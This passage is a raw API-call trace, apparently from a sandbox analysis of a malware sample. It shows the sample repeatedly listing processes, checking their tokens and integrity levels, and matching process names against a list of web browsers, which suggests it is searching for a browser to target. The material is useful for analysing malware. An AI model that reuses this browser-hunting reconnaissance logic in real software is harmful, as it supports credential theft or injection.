[0592.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0592.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0592.655] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x4e0 [0592.655] OpenProcessToken (in: ProcessHandle=0x4e0, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x66c) returned 1 [0592.655] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0592.655] GetLastError () returned 0x7a [0592.655] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0592.655] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0592.655] CloseHandle (hObject=0x66c) returned 1 [0592.655] CloseHandle (hObject=0x4e0) returned 1 [0592.655] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0592.655] OpenProcessToken (in: ProcessHandle=0x4e0, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x66c) returned 1 [0592.655] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0592.655] GetLastError () returned 0x7a [0592.655] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x41b288, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b288, ReturnLength=0x20f7d8) returned 1 [0592.655] GetSidSubAuthorityCount (pSid=0x41b290*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b291 [0592.655] GetSidSubAuthority (pSid=0x41b290*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b298 [0592.655] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0592.655] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0592.655] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0592.655] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0592.655] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0592.655] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0592.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0592.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x4e0 [0592.656] OpenProcessToken (in: ProcessHandle=0x4e0, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x66c) returned 1 [0592.656] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0592.656] GetLastError () returned 0x7a [0592.656] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0592.656] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0592.656] CloseHandle (hObject=0x66c) returned 1 [0592.656] CloseHandle (hObject=0x4e0) returned 1 [0592.656] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0592.656] OpenProcessToken (in: ProcessHandle=0x4e0, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x66c) returned 1 [0592.656] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0592.656] GetLastError () returned 0x7a [0592.656] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x41b288, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b288, ReturnLength=0x20f7d8) returned 1 [0592.656] GetSidSubAuthorityCount (pSid=0x41b290*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b291 [0592.656] GetSidSubAuthority (pSid=0x41b290*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b298 [0592.656] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0592.656] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0592.656] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0592.656] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0592.656] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0592.656] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0592.656] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x4e0 [0592.656] OpenProcessToken (in: ProcessHandle=0x4e0, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x66c) returned 1 [0592.656] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0592.656] GetLastError () returned 0x7a [0592.656] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0592.656] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0592.656] CloseHandle (hObject=0x66c) returned 1 [0592.656] CloseHandle (hObject=0x4e0) returned 1 [0592.656] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0592.656] OpenProcessToken (in: ProcessHandle=0x4e0, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x66c) returned 1 [0592.656] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0592.656] GetLastError () returned 0x7a [0592.656] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x41b288, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b288, ReturnLength=0x20f7d8) returned 1 [0592.657] GetSidSubAuthorityCount (pSid=0x41b290*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b291 [0592.657] GetSidSubAuthority (pSid=0x41b290*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b298 [0592.657] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0592.657] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0592.657] lstrcmpiW (lpString1="opera.exe", lpString2="explorer.exe") returned 1 [0592.657] lstrcmpiW (lpString1="iexplore.exe", lpString2="explorer.exe") returned 1 [0592.657] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="explorer.exe") returned 1 [0592.657] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="explorer.exe") returned 1 [0592.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0 [0592.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6b4) returned 0x4e0 [0592.657] OpenProcessToken (in: ProcessHandle=0x4e0, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x66c) returned 1 [0592.657] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0592.657] GetLastError () returned 0x7a [0592.657] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0592.657] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0592.657] CloseHandle (hObject=0x66c) returned 1 [0592.657] CloseHandle (hObject=0x4e0) returned 1 [0592.657] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0592.657] OpenProcessToken (in: ProcessHandle=0x4e0, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x66c) returned 1 [0592.657] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0592.657] GetLastError () returned 0x7a [0592.657] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x41b288, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b288, ReturnLength=0x20f7d8) returned 1 [0592.657] GetSidSubAuthorityCount (pSid=0x41b290*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b291 [0592.657] GetSidSubAuthority (pSid=0x41b290*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b298 [0592.657] lstrcmpiW (lpString1="firefox.exe", lpString2="ONENOTEM.EXE") returned -1 [0592.657] lstrcmpiW (lpString1="chrome.exe", lpString2="ONENOTEM.EXE") returned -1 [0592.657] lstrcmpiW (lpString1="opera.exe", lpString2="ONENOTEM.EXE") returned 1 [0592.657] lstrcmpiW (lpString1="iexplore.exe", lpString2="ONENOTEM.EXE") returned -1 [0592.657] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="ONENOTEM.EXE") returned -1 [0592.657] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="ONENOTEM.EXE") returned -1 [0592.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x118) returned 0x0 [0592.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x724) returned 0x0 [0592.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2ac) returned 0x0 [0592.657] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7e0) returned 0x4e0 [0592.657] OpenProcessToken (in: ProcessHandle=0x4e0, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x66c) returned 1 [0592.657] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0592.657] GetLastError () returned 0x7a [0592.657] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x1, TokenInformation=0x40fe98, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fe98, ReturnLength=0x20f7ac) returned 1 [0592.658] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0592.658] CloseHandle (hObject=0x66c) returned 1 [0592.658] CloseHandle (hObject=0x4e0) returned 1 [0592.658] GetLengthSid (pSid=0x40fea0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0592.658] OpenProcessToken (in: ProcessHandle=0x4e0, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x66c) returned 1 [0592.658] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0592.658] GetLastError () returned 0x7a [0592.658] GetTokenInformation (in: TokenHandle=0x66c, TokenInformationClass=0x19, TokenInformation=0x41b288, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41b288, ReturnLength=0x20f7d8) returned 1 [0592.658] GetSidSubAuthorityCount (pSid=0x41b290*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41b291 [0592.658] GetSidSubAuthority (pSid=0x41b290*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41b298 [0592.658] lstrcmpiW (lpString1="firefox.exe", lpString2="svchost.exe") returned -1 [0592.658] lstrcmpiW (lpString1="chrome.exe", lpString2="svchost.exe") returned -1 [0592.658] lstrcmpiW (lpString1="opera.exe", lpString2="svchost.exe") returned -1 [0592.658] lstrcmpiW (lpString1="iexplore.exe", lpString2="svchost.exe") returned -1 [0592.658] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="svchost.exe") returned -1 [0592.658] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="svchost.exe") returned -1 [0592.658] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x610) returned 0x0 [0592.658] VirtualFree (lpAddress=0x450000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0592.658] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x7d0) returned 0x102 [0594.666] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x20f7fc | out: SystemInformation=0x0, ResultLength=0x20f7fc*=0x9a78) returned 0xc0000004 [0594.666] VirtualAlloc (lpAddress=0x0, dwSize=0xaa78, flAllocationType=0x1000, flProtect=0x4) returned 0x450000 [0594.667] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x450000, Length=0xaa78, ResultLength=0x0 | out: SystemInformation=0x450000, ResultLength=0x0) returned 0x0 [0594.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0594.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0594.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0594.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0594.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x178) returned 0x0 [0594.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x184) returned 0x0 [0594.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1ac) returned 0x0 [0594.668] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0594.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e0) returned 0x0 [0594.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1e8) returned 0x0 [0594.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0594.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x294) returned 0x0 [0594.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c4) returned 0x0 [0594.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x32c) returned 0x0 [0594.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x358) returned 0x0 [0594.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x39c) returned 0x0 [0594.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3e8) returned 0x0 [0594.669] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0 [0594.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x304) returned 0x0 [0594.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x43c) returned 0x0 [0594.670] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4c8) returned 0x668 [0594.670] OpenProcessToken (in: ProcessHandle=0x668, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x4e0) returned 1 [0594.670] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0594.670] GetLastError () returned 0x7a [0594.670] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x1, TokenInformation=0x40fd48, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd48, ReturnLength=0x20f7ac) returned 1 [0594.670] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0594.670] CloseHandle (hObject=0x4e0) returned 1 [0594.671] CloseHandle (hObject=0x668) returned 1 [0594.671] GetLengthSid (pSid=0x40fd50*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0594.671] OpenProcessToken (in: ProcessHandle=0x668, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x4e0) returned 1 [0594.671] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0594.671] GetLastError () returned 0x7a [0594.671] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x19, TokenInformation=0x41aec8, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41aec8, ReturnLength=0x20f7d8) returned 1 [0594.671] GetSidSubAuthorityCount (pSid=0x41aed0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41aed1 [0594.671] GetSidSubAuthority (pSid=0x41aed0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41aed8 [0594.672] lstrcmpiW (lpString1="firefox.exe", lpString2="taskhost.exe") returned -1 [0594.672] lstrcmpiW (lpString1="chrome.exe", lpString2="taskhost.exe") returned -1 [0594.672] lstrcmpiW (lpString1="opera.exe", lpString2="taskhost.exe") returned -1 [0594.672] lstrcmpiW (lpString1="iexplore.exe", lpString2="taskhost.exe") returned -1 [0594.672] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="taskhost.exe") returned -1 [0594.672] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="taskhost.exe") returned -1 [0594.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4f0) returned 0x0 [0594.672] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x558) returned 0x668 [0594.672] OpenProcessToken (in: ProcessHandle=0x668, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x4e0) returned 1 [0594.672] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0594.672] GetLastError () returned 0x7a [0594.673] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x1, TokenInformation=0x40fd48, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd48, ReturnLength=0x20f7ac) returned 1 [0594.673] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0594.673] CloseHandle (hObject=0x4e0) returned 1 [0594.673] CloseHandle (hObject=0x668) returned 1 [0594.673] GetLengthSid (pSid=0x40fd50*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0594.673] OpenProcessToken (in: ProcessHandle=0x668, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x4e0) returned 1 [0594.673] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0594.673] GetLastError () returned 0x7a [0594.674] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x19, TokenInformation=0x41aec8, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41aec8, ReturnLength=0x20f7d8) returned 1 [0594.674] GetSidSubAuthorityCount (pSid=0x41aed0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41aed1 [0594.674] GetSidSubAuthority (pSid=0x41aed0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41aed8 [0594.674] lstrcmpiW (lpString1="firefox.exe", lpString2="dwm.exe") returned 1 [0594.674] lstrcmpiW (lpString1="chrome.exe", lpString2="dwm.exe") returned -1 [0594.674] lstrcmpiW (lpString1="opera.exe", lpString2="dwm.exe") returned 1 [0594.674] lstrcmpiW (lpString1="iexplore.exe", lpString2="dwm.exe") returned 1 [0594.674] lstrcmpiW (lpString1="MicrosoftEdge.exe", lpString2="dwm.exe") returned 1 [0594.674] lstrcmpiW (lpString1="MicrosoftEdgeCP.exe", lpString2="dwm.exe") returned 1 [0594.674] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x570) returned 0x668 [0594.674] OpenProcessToken (in: ProcessHandle=0x668, DesiredAccess=0x8, TokenHandle=0x20f7c4 | out: TokenHandle=0x20f7c4*=0x4e0) returned 1 [0594.675] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7ac | out: TokenInformation=0x0, ReturnLength=0x20f7ac) returned 0 [0594.675] GetLastError () returned 0x7a [0594.675] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x1, TokenInformation=0x40fd48, TokenInformationLength=0x24, ReturnLength=0x20f7ac | out: TokenInformation=0x40fd48, ReturnLength=0x20f7ac) returned 1 [0594.675] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0xc, TokenInformation=0x20f7dc, TokenInformationLength=0x4, ReturnLength=0x20f7c0 | out: TokenInformation=0x20f7dc, ReturnLength=0x20f7c0) returned 1 [0594.675] CloseHandle (hObject=0x4e0) returned 1 [0594.675] CloseHandle (hObject=0x668) returned 1 [0594.675] GetLengthSid (pSid=0x40fd50*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x68))) returned 0x1c [0594.675] OpenProcessToken (in: ProcessHandle=0x668, DesiredAccess=0x20008, TokenHandle=0x20f7dc | out: TokenHandle=0x20f7dc*=0x4e0) returned 1 [0594.676] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20f7d8 | out: TokenInformation=0x0, ReturnLength=0x20f7d8) returned 0 [0594.676] GetLastError () returned 0x7a [0594.676] GetTokenInformation (in: TokenHandle=0x4e0, TokenInformationClass=0x19, TokenInformation=0x41aec8, TokenInformationLength=0x14, ReturnLength=0x20f7d8 | out: TokenInformation=0x41aec8, ReturnLength=0x20f7d8) returned 1 [0594.676] GetSidSubAuthorityCount (pSid=0x41aed0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x41aed1 [0594.676] GetSidSubAuthority (pSid=0x41aed0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x41aed8 [0594.676] lstrcmpiW (lpString1="firefox.exe", lpString2="explorer.exe") returned 1 [0594.676] lstrcmpiW (lpString1="chrome.exe", lpString2="explorer.exe") returned -1 [0594.676] lstrcmpiW (lpString1="opera.exe", 